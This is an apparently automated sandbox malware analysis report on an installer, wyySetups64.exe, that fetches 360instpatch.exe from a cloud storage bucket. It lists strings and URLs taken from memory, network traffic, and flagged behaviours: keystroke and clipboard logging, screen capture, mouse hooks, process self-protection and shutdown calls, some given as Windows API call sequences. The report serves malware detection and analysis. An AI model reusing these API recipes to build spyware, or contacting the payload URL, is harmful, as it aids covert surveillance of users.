    Source: 360instpatch.exe, 00000008.00000003.1797435191.0000000004239000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000003.1797588551.00000000040AC000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.8.dr, sites.dll.8.drString found in binary or memory: http://sf.symcd.com0&
    Source: 360instpatch.exeString found in binary or memory: http://sfdw.360safe.com/safesetup_2000.exe
    Source: 360instpatch.exe, 00000008.00000000.1789664825.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000000.1798248831.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000002.1799466185.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drString found in binary or memory: http://sfdw.360safe.com/safesetup_2000.exe360
    Source: 360instpatch.exe, 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000002.1799585748.0000000000EED000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drString found in binary or memory: http://sfdw.360safe.com/setup.exe.exe
    Source: 360instpatch.exe, 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000002.1799585748.0000000000EED000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drString found in binary or memory: http://sfdw.360safe.com/setupbeta.exe4(u7b4N
    Source: 360instpatch.exeString found in binary or memory: http://sfdw.360safe.com/superkiller/superkillerexe_880765522ded7527821ce7448af08018_5.1.64.1181.cab
    Source: 360instpatch.exe, 00000008.00000000.1789664825.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000000.1798248831.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000002.1799466185.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drString found in binary or memory: http://sfdw.360safe.com/superkiller/superkillerexe_880765522ded7527821ce7448af08018_5.1.64.1181.cabh
    Source: 360instpatch.exeString found in binary or memory: http://sfdw.360safe.com/superkiller/superkillerexe_ce61817f687d599de13ee9deb1af83e2_5.1.0.1181.cab
    Source: sites.dll.8.drString found in binary or memory: http://sv.symcb.com/sv.crl0a
    Source: 360instpatch.exe, 00000008.00000003.1797435191.0000000004239000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000003.1797588551.00000000040AC000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.8.drString found in binary or memory: http://sv.symcb.com/sv.crl0f
    Source: 360instpatch.exe, 00000008.00000003.1797435191.0000000004239000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000003.1797588551.00000000040AC000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.8.dr, sites.dll.8.drString found in binary or memory: http://sv.symcb.com/sv.crt0
    Source: 360instpatch.exe, 00000008.00000003.1797435191.0000000004239000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000003.1797588551.00000000040AC000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.8.dr, sites.dll.8.drString found in binary or memory: http://sv.symcd.com0&
    Source: 360instpatch.exe, 00000008.00000003.1797435191.0000000004239000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000003.1797588551.00000000040AC000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.8.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
    Source: 360instpatch.exe, 00000008.00000003.1797435191.0000000004239000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000003.1797588551.00000000040AC000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.8.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
    Source: 360instpatch.exe, 00000008.00000003.1797435191.0000000004239000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000003.1797588551.00000000040AC000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.8.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
    Source: 360instpatch.exeString found in binary or memory: http://wpad.%s/wpad.dat
    Source: 360instpatch.exe, 00000008.00000003.1797435191.0000000004191000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmp, 360P2SP.dll.8.drString found in binary or memory: http://wpad.%s/wpad.dathttp://%s/wpad.datwpad
    Source: 360instpatch.exe, 00000008.00000003.1797435191.0000000004239000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000003.1797588551.00000000040AC000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.8.dr, sites.dll.8.drString found in binary or memory: http://www.360.cn
    Source: 360instpatch.exe, 360instpatch.exe, 00000008.00000003.1797435191.0000000004191000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmp, 360P2SP.dll.8.drString found in binary or memory: http://www.360.cn/
    Source: 360instpatch.exe, 00000008.00000003.1797435191.0000000004191000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmp, 360P2SP.dll.8.drString found in binary or memory: http://www.360.cn//index.html127.0.0.1--
    Source: 360instpatch.exe, 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000002.1799585748.0000000000EED000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drString found in binary or memory: http://www.360.cn/xukexieyi.html#360
    Source: 360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
    Source: powershell.exe, 00000006.00000002.1774677766.0000000005685000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1780192151.0000000007A74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: 360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
    Source: 360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
    Source: 360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
    Source: 360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
    Source: 360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
    Source: 360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
    Source: 360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
    Source: 360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
    Source: 360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
    Source: 360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
    Source: 360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
    Source: 360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
    Source: 360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
    Source: 360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
    Source: 360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
    Source: 360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
    Source: 360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
    Source: powershell.exe, 00000006.00000002.1780265823.0000000007AD6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
    Source: 360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
    Source: 360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
    Source: 360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
    Source: 360instpatch.exe, 00000008.00000003.1797435191.0000000004239000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000003.1797588551.00000000040AC000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.8.dr, sites.dll.8.drString found in binary or memory: http://www.symauth.com/cps0(
    Source: 360instpatch.exe, 00000008.00000003.1797435191.0000000004239000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000003.1797588551.00000000040AC000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.8.dr, sites.dll.8.drString found in binary or memory: http://www.symauth.com/rpa00
    Source: 360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
    Source: 360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
    Source: 360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
    Source: 360instpatch.exe, 00000008.00000002.4119635939.00000000065D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
    Source: powershell.exe, 00000006.00000002.1774677766.0000000005531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1765795867.0000000004838000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1765795867.0000000004825000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBqq
    Source: 360instpatch.exeString found in binary or memory: https://bbs.360.cn/thread-16079507-1-1.html
    Source: 360instpatch.exe, 00000008.00000000.1789664825.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000000.1798248831.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000002.1799466185.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drString found in binary or memory: https://bbs.360.cn/thread-16079507-1-1.htmlD
    Source: powershell.exe, 00000006.00000002.1778471826.0000000006598000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000006.00000002.1778471826.0000000006598000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000006.00000002.1778471826.0000000006598000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: 360instpatch.exe, 00000008.00000003.1797435191.0000000004239000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000003.1797588551.00000000040AC000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.8.dr, sites.dll.8.drString found in binary or memory: https://d.symcb.com/cps0%
    Source: 360P2SP.dll.8.dr, sites.dll.8.drString found in binary or memory: https://d.symcb.com/rpa0
    Source: 360instpatch.exe, 00000008.00000003.1797435191.0000000004239000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000003.1797588551.00000000040AC000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.8.drString found in binary or memory: https://d.symcb.com/rpa0.
    Source: 360instpatch.exe, 00000008.00000003.1831082054.0000000005033000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.microso
    Source: svchost.exe, 0000000C.00000003.1825614884.000001A6AFB32000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.12.dr, edb.log.12.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
    Source: edb.log.12.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
    Source: edb.log.12.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
    Source: edb.log.12.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
    Source: svchost.exe, 0000000C.00000003.1825614884.000001A6AFB32000.00000004.00000800.00020000.00000000.sdmp, edb.log.12.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
    Source: powershell.exe, 00000006.00000002.1774677766.0000000005685000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000006.00000002.1774677766.0000000005B9E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1774677766.0000000005E88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
    Source: wyySetups64.exe, 00000000.00000002.1810189166.000000000080D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gwwifha84989.oss-ap-northeast-2.aliyuncs.com/
    Source: wyySetups64.exe, 00000000.00000002.1810189166.00000000007B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gwwifha84989.oss-ap-northeast-2.aliyuncs.com/34-1002
    Source: wyySetups64.exe, 00000000.00000002.1810189166.00000000007B7000.00000004.00000020.00020000.00000000.sdmp, wyySetups64.exe, 00000000.00000002.1809349190.0000000000198000.00000004.00000010.00020000.00000000.sdmp, wyySetups64.exe, 00000000.00000002.1809394272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, wyySetups64.exe, 00000001.00000002.4114622663.000000000019B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://gwwifha84989.oss-ap-northeast-2.aliyuncs.com/360instpatch.exe
    Source: wyySetups64.exe, 00000000.00000002.1810189166.00000000007B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gwwifha84989.oss-ap-northeast-2.aliyuncs.com/360instpatch.exe0/
    Source: wyySetups64.exe, 00000000.00000002.1809349190.0000000000198000.00000004.00000010.00020000.00000000.sdmp, wyySetups64.exe, 00000000.00000002.1809394272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, wyySetups64.exe, 00000001.00000002.4114622663.000000000019B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://gwwifha84989.oss-ap-northeast-2.aliyuncs.com/360instpatch.exen
    Source: wyySetups64.exe, 00000000.00000002.1810189166.00000000007B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gwwifha84989.oss-ap-northeast-2.aliyuncs.com/360instpatch.exez
    Source: 360instpatch.exeString found in binary or memory: https://hao.360.cn
    Source: 360instpatch.exeString found in binary or memory: https://hao.360.cn/
    Source: 360instpatch.exeString found in binary or memory: https://hao.360.cn/?installer
    Source: 360instpatch.exe, 00000008.00000000.1789664825.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000000.1798248831.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000002.1799466185.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drString found in binary or memory: https://hao.360.cn/?installerhttps://hao.360.cnhttps://http://https://hao.360.cn/%s
    Source: 360instpatch.exe, 00000008.00000002.4115869359.000000000155E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.commDataAPPDATA=C:
    Source: powershell.exe, 00000006.00000002.1778471826.0000000006598000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
    Source: svchost.exe, 0000000C.00000003.1825614884.000001A6AFB32000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.12.dr, edb.log.12.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
    Source: edb.log.12.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
    Source: wyySetups64.exe, wyySetups64.exe.0.drString found in binary or memory: https://sectigo.com/CPS0
    Source: wyySetups64.exe, 00000000.00000002.1818515504.000000000325B000.00000004.00000010.00020000.00000000.sdmp, wyySetups64.exe, 00000000.00000002.1810189166.0000000000821000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000003.1797435191.0000000004239000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000003.1797588551.00000000040AC000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.8.dr, sites.dll.8.dr, 360instpatch[1].exe.0.dr, 360instpatch.exe.0.drString found in binary or memory: https://www.globalsign.com/repository/0
    Source: 360instpatch.exe, 00000008.00000003.1797435191.0000000004239000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000003.1797588551.00000000040AC000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.8.dr, sites.dll.8.drString found in binary or memory: https://www.globalsign.com/repository/03
    Source: sites.dll.8.drString found in binary or memory: https://www.globalsign.com/repository/06
    Source: wyySetups64.exe, wyySetups64.exe.0.drString found in binary or memory: https://www.innosetup.com/
    Source: wyySetups64.exe, wyySetups64.exe.0.drString found in binary or memory: https://www.remobjects.com/ps
    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
    Source: unknownHTTPS traffic detected: 149.129.12.34:443 -> 192.168.2.4:49735 version: TLS 1.2

    Key, Mouse, Clipboard, Microphone and Screen Capturing

    barindex
    Contains functionality to capture and log keystrokes
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: [esc]1_2_0337E850
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: [esc]1_2_0337E850
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: [esc]1_2_0337E850
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: [esc]1_2_0337E850
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_0337E850 Sleep,CreateMutexW,GetLastError,_memset,Sleep,GetTickCount,GetTickCount,GetTickCount,InterlockedExchange,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,wsprintfW,_memset,GlobalUnlock,CloseClipboard,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,GetKeyState,lstrlenW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,wsprintfW,wsprintfW,lstrlenW,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,1_2_0337E850
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_0337E850 Sleep,CreateMutexW,GetLastError,_memset,Sleep,GetTickCount,GetTickCount,GetTickCount,InterlockedExchange,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,wsprintfW,_memset,GlobalUnlock,CloseClipboard,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,GetKeyState,lstrlenW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,wsprintfW,wsprintfW,lstrlenW,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,1_2_0337E850
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_0337BC70 GetDesktopWindow,GetDC,GetDC,CreateCompatibleDC,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,ReleaseDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CreateCompatibleBitmap,SelectObject,SetStretchBltMode,GetSystemMetrics,GetSystemMetrics,StretchBlt,_memset,GetDIBits,_memset,DeleteObject,DeleteObject,ReleaseDC,DeleteObject,DeleteObject,ReleaseDC,1_2_0337BC70
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_0337E4F0 Sleep,CreateMutexW,GetLastError,SHGetFolderPathW,lstrcatW,CreateMutexW,WaitForSingleObject,CreateFileW,GetFileSize,CloseHandle,DeleteFileW,ReleaseMutex,DirectInput8Create,GetTickCount,GetKeyState,1_2_0337E4F0
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeWindows user hook set: 0 mouse low level C:\Windows\SYSTEM32\DINPUT8.dllJump to behavior

    E-Banking Fraud

    barindex
    Checks if browser processes are running
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: _memset,GetUserNameW,__wcsicoll,_memset,GetModuleFileNameW,StrStrIW, Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TempState\Downloads8_2_00B68A46

    Operating System Destruction

    barindex
    Protects its processes via BreakOnTermination flag
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeProcess information set: 01 00 00 00 Jump to behavior
    Source: C:\Users\user\Desktop\wyySetups64.exeCode function: 0_2_00D51087 NtdllDefWindowProc_W,0_2_00D51087
    Source: C:\Users\user\Desktop\wyySetups64.exeCode function: 0_2_00D51A37 GetModuleHandleA,CreateWindowExW,SendMessageW,CreateThread,PostQuitMessage,NtdllDefWindowProc_W,0_2_00D51A37
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00B1E080: GetCurrentProcessId,CreateFileW,DeviceIoControl,CloseHandle,8_2_00B1E080
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_0337B43F ExitWindowsEx,1_2_0337B43F
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_0337B41B ExitWindowsEx,1_2_0337B41B
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_0337B463 ExitWindowsEx,1_2_0337B463
    Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
    Source: C:\Users\user\Desktop\wyySetups64.exeCode function: 0_2_10010F100_2_10010F10
    Source: C:\Users\user\Desktop\wyySetups64.exeCode function: 0_2_00D500320_2_00D50032
    Source: C:\Users\user\Desktop\wyySetups64.exeCode function: 0_2_00D60EE70_2_00D60EE7
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_03376EE01_2_03376EE0
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_03376C501_2_03376C50
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_0338E3411_2_0338E341
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_033883811_2_03388381
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_0338EA1D1_2_0338EA1D
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_033789001_2_03378900
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_0338F9FF1_2_0338F9FF
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_0338D89F1_2_0338D89F
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_0338DDF01_2_0338DDF0
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_033724B01_2_033724B0
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_00BE122F1_2_00BE122F
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_00BD24B01_2_00BD24B0
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_00BE0CDE1_2_00BE0CDE
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_00BE2D911_2_00BE2D91
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_00BDB66A1_2_00BDB66A
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_00BE1E5C1_2_00BE1E5C
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_00BE17801_2_00BE1780
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_00B200321_2_00B20032
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_00B312061_2_00B31206
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_00B30CB51_2_00B30CB5
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_00B224871_2_00B22487
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_00B32D681_2_00B32D68
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_00B2B6411_2_00B2B641
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_00B317571_2_00B31757
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_0320F3BE1_2_0320F3BE
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_0320D25E1_2_0320D25E
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_031F82BF1_2_031F82BF
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_031F689F1_2_031F689F
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_0320D7AF1_2_0320D7AF
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_031F660F1_2_031F660F
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_031F1E6F1_2_031F1E6F
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_0320DD001_2_0320DD00
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_03207D401_2_03207D40
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00B492458_2_00B49245
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00B6592D8_2_00B6592D
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00B9C8E08_2_00B9C8E0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00B229608_2_00B22960
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00B1AA008_2_00B1AA00
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00B4AB338_2_00B4AB33
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00B30F048_2_00B30F04
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00B130C08_2_00B130C0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00B171F08_2_00B171F0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00B8729C8_2_00B8729C
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00B312818_2_00B31281
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00B174F08_2_00B174F0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00BA39CB8_2_00BA39CB
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00B939708_2_00B93970
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00B1FF008_2_00B1FF00
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00B1FF708_2_00B1FF70
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BEEB3F08_2_6BEEB3F0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BF0F4948_2_6BF0F494
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BF4EBCF8_2_6BF4EBCF
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BF54AB08_2_6BF54AB0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BEE2A308_2_6BEE2A30
